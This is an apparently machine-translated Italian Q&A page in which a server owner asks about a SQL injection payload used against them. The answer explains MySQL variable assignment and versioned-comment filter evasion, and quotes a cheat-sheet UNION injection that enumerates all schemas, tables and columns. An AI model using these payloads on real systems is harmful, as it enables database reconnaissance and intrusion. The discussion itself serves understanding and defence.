Comprensione del payload di iniezione SQL

24

Il mio server è stato colpito dal seguente payload di iniezione SQL: -

((/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from('InFoRMAtiON_sCHeMa'.'ColUMNs')where('TAblE_sCHemA'=DatAbAsE/*data*/())and(@)in(@:=CoNCat(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a))

Che cosa significano (@) e (@: = 0x00) in questo payload?

per l'esecuzione standalone, il payload sopra deve essere eseguito come: -

select ((/ ! 12345sELecT / (@) from (/ ! 12345sELecT / (@: = 0x00), (/ ! 12345sELecT / (@) da ( InFoRMAtiON_sCHeMa ColUMNs .), dove (% = / em> dati% co_de database < / ()) e (@) in (@: = concat (@, 0x3c62723e5461626c6520466f756e64203a20, tABLE_NAME, 0x3a3a, nome_colonna)))) a));

Il payload ha avuto l'errore di sintassi.

    
posta Aayush 24.07.2017 - 08:58
fonte

1 risposta

28

What does (@) and (@:=0x00) stand for in this payload?

  • @ - è il nome della variabile
  • @:=0x00 - è l'assegnazione di zero in questa variabile.

Nota: := è il assegnatario-operatore

Grazie per @Frank Cedeno e @strnk per il loro Q & A nei commenti.

@Frank Cedeno - How /!12345sELecT/ becomes select?

@strnk - This is a MySQL-specific extension to SQL comments, the sELecT is only included in the query if the server version is greater or equal to 12345 (1.23.45), so it filters-out non-MySQL servers

Altre informazioni:

Da websec sql_injection :

Recupero di più tabelle / colonne contemporaneamente

SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x

Esempio:

SELECT * FROM Users WHERE id = '-1' UNION SELECT 1, 2, (SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x), 4--+';

Output:

[ information_schema ] >CHARACTER_SETS > CHARACTER_SET_NAME
[ information_schema ] >CHARACTER_SETS > DEFAULT_COLLATE_NAME
[ information_schema ] >CHARACTER_SETS > DESCRIPTION
[ information_schema ] >CHARACTER_SETS > MAXLEN
[ information_schema ] >COLLATIONS > COLLATION_NAME
[ information_schema ] >COLLATIONS > CHARACTER_SET_NAME
[ information_schema ] >COLLATIONS > ID
[ information_schema ] >COLLATIONS > IS_DEFAULT
[ information_schema ] >COLLATIONS > IS_COMPILED

Questa risposta StackOverflow spiega il codice SQL:

First of all i would make the query a litte bit more readable by reformatting it:

1) SELECT (SELECT (@)
2)         FROM (SELECT (@:=0x00),
3)                      (SELECT (@)
4)                       FROM (information_schema.columns)
5)                       WHERE (table_schema >= @)
6)                       AND   (@) IN (@:=CONCAT(@,0x3C,0x62,0x72,0x3E,' [ ',table_schema,' ] > ',table_name,' > ',column_name))
7)                       )
8)               )
9)        a);

The assignment of @ is as follows:

  1. In Line 3 it gets the value 0x00 (Decimal: 0)
  2. In line 5 this value is used for the greater than (table_schema >= 0)
  3. Line 6 is a way to concat each schema, table and column name into @
  4. @ is returned in line 1 and contains a concatenated list of your structures

In line 6 an additional <br> (0x3C,0x62,0x72,0x3E) is added to the variable to make the output more readable

    
risposta data 24.07.2017 - 09:28
fonte

Leggi altre domande sui tag